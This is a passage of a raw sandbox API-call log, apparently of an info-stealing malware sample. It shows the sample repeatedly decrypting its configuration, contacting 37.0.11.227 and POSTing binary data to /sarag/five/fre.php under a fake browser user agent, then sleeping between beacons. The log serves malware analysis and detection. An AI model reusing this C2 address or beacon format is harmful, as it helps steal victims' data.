[0335.387] GetProcessHeap () returned 0x690000 [0335.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0335.387] GetProcessHeap () returned 0x690000 [0335.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.388] send (s=0xbe4, buf=0x6ad508*, len=242, flags=0) returned 242 [0335.388] send (s=0xbe4, buf=0x6aba40*, len=159, flags=0) returned 159 [0335.389] GetProcessHeap () returned 0x690000 [0335.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0335.389] recv (in: s=0xbe4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0335.461] GetProcessHeap () returned 0x690000 [0335.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0335.462] GetProcessHeap () returned 0x690000 [0335.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0335.463] GetProcessHeap () returned 0x690000 [0335.463] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0335.465] GetProcessHeap () returned 0x690000 [0335.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0335.465] closesocket (s=0xbe4) returned 0 [0335.466] GetProcessHeap () returned 0x690000 [0335.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0335.466] GetProcessHeap () returned 0x690000 [0335.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.467] GetProcessHeap () returned 0x690000 [0335.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0335.468] GetProcessHeap () returned 0x690000 [0335.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0335.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1934) returned 0xbe4 [0335.471] Sleep (dwMilliseconds=0xea60) [0335.472] GetProcessHeap () returned 0x690000 [0335.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0335.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.474] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.482] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0335.490] GetProcessHeap () returned 0x690000 [0335.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0335.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.491] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.492] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.497] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.497] GetProcessHeap () returned 0x690000 [0335.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0335.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.498] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0335.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.499] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.501] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0335.501] GetProcessHeap () returned 0x690000 [0335.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.502] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0335.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.503] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0335.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.504] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0335.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.505] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0335.505] GetProcessHeap () returned 0x690000 [0335.505] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0335.506] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0335.506] GetProcessHeap () returned 0x690000 [0335.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0335.507] GetProcessHeap () returned 0x690000 [0335.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.507] GetProcessHeap () returned 0x690000 [0335.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0335.508] GetProcessHeap () returned 0x690000 [0335.508] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0335.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.516] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0335.524] GetProcessHeap () returned 0x690000 [0335.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0335.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.525] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.526] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.528] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.528] GetProcessHeap () returned 0x690000 [0335.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0335.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.531] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0335.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.532] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.534] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0335.534] GetProcessHeap () returned 0x690000 [0335.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.535] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0335.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.536] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0335.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.538] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0335.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.539] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0335.539] GetProcessHeap () returned 0x690000 [0335.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0335.539] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0335.539] GetProcessHeap () returned 0x690000 [0335.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0335.539] socket (af=2, type=1, protocol=6) returned 0xbe8 [0335.540] connect (s=0xbe8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0335.566] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0335.566] GetProcessHeap () returned 0x690000 [0335.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0335.566] GetProcessHeap () returned 0x690000 [0335.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0335.567] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.568] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0335.568] GetProcessHeap () returned 0x690000 [0335.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0335.568] GetProcessHeap () returned 0x690000 [0335.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.568] GetProcessHeap () returned 0x690000 [0335.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0335.568] GetProcessHeap () returned 0x690000 [0335.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0335.570] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.571] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0335.571] GetProcessHeap () returned 0x690000 [0335.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0335.571] GetProcessHeap () returned 0x690000 [0335.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.571] send (s=0xbe8, buf=0x6ad508*, len=242, flags=0) returned 242 [0335.572] send (s=0xbe8, buf=0x6aba40*, len=159, flags=0) returned 159 [0335.572] GetProcessHeap () returned 0x690000 [0335.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0335.572] recv (in: s=0xbe8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0335.656] GetProcessHeap () returned 0x690000 [0335.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0335.658] GetProcessHeap () returned 0x690000 [0335.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0335.658] GetProcessHeap () returned 0x690000 [0335.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0335.659] GetProcessHeap () returned 0x690000 [0335.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0335.659] closesocket (s=0xbe8) returned 0 [0335.659] GetProcessHeap () returned 0x690000 [0335.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0335.659] GetProcessHeap () returned 0x690000 [0335.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.660] GetProcessHeap () returned 0x690000 [0335.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0335.660] GetProcessHeap () returned 0x690000 [0335.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0335.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x193c) returned 0xbe8 [0335.662] Sleep (dwMilliseconds=0xea60) [0335.663] GetProcessHeap () returned 0x690000 [0335.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0335.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.664] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0335.676] GetProcessHeap () returned 0x690000 [0335.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0335.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.677] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.678] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.679] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.679] GetProcessHeap () returned 0x690000 [0335.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0335.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.680] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0335.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.681] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.681] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0335.682] GetProcessHeap () returned 0x690000 [0335.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.682] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0335.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.684] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0335.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.685] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0335.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.686] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0335.686] GetProcessHeap () returned 0x690000 [0335.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0335.686] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0335.686] GetProcessHeap () returned 0x690000 [0335.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0335.687] GetProcessHeap () returned 0x690000 [0335.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0335.687] GetProcessHeap () returned 0x690000 [0335.688] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0335.688] GetProcessHeap () returned 0x690000 [0335.688] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0335.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.689] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0335.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.693] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0335.699] GetProcessHeap () returned 0x690000 [0335.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0335.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.700] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0335.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.701] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0335.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.701] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0335.701] GetProcessHeap () returned 0x690000 [0335.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0335.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.703] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0335.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.704] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0335.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0335.705] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0335.705] GetProcessHeap () returned 0x690000 [0335.705] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0335.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.706] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0335.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.707] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0335.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.708] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0335.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.709] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0335.709] GetProcessHeap () returned 0x690000 [0335.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0335.709] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0335.709] GetProcessHeap () returned 0x690000 [0335.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0335.709] socket (af=2, type=1, protocol=6) returned 0xbec [0335.709] connect (s=0xbec, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0335.738] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0335.738] GetProcessHeap () returned 0x690000 [0335.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0335.738] GetProcessHeap () returned 0x690000 [0335.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0335.739] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.740] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0335.740] GetProcessHeap () returned 0x690000 [0335.740] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0335.740] GetProcessHeap () returned 0x690000 [0335.741] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.741] GetProcessHeap () returned 0x690000 [0335.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0335.741] GetProcessHeap () returned 0x690000 [0335.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0335.741] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0335.742] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0335.742] GetProcessHeap () returned 0x690000 [0335.742] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0335.742] GetProcessHeap () returned 0x690000 [0335.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0335.743] send (s=0xbec, buf=0x6ad508*, len=242, flags=0) returned 242 [0335.745] send (s=0xbec, buf=0x6aba40*, len=159, flags=0) returned 159 [0335.745] GetProcessHeap () returned 0x690000 [0335.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0335.745] recv (in: s=0xbec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0335.824] GetProcessHeap () returned 0x690000 [0335.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0335.824] GetProcessHeap () returned 0x690000 [0335.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0335.825] GetProcessHeap () returned 0x690000 [0335.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0335.826] GetProcessHeap () returned 0x690000 [0335.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 